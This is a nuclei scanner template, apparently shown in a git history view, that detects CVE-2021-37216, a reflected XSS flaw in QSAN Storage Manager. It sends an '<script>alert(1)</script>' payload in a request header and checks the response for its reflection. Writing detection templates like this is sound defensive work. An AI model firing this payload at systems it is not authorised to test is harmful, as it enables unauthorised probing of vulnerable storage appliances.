nuclei-templates/cves/2021/CVE-2021-37216.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2021-08-03 14:31:33 +00:00
id: CVE-2021-37216
info:
name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
author: dwisiswant0
description: |
QSAN Storage Manager header page parameters does not filter special characters.
Remote attackers can inject JavaScript without logging in and launch
reflected XSS attacks to access and modify specific data.
reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
severity: medium
tags: cve,cve2021,xss,qsan
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-37216
cwe-id: CWE-79
2021-08-03 14:31:33 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/http_header.php"
headers:
X-Trigger-XSS: "<script>alert(1)</script>"
2021-08-03 14:44:14 +00:00
2021-08-03 14:31:33 +00:00
matchers-condition: and
matchers:
2021-08-03 14:44:14 +00:00
2021-08-03 14:31:33 +00:00
- type: word
part: body
words:
2021-08-03 14:44:14 +00:00
- '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'
2021-08-03 14:31:33 +00:00
- type: word
part: header
words:
- "text/html"
2021-08-03 14:44:14 +00:00
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-xss-protection')"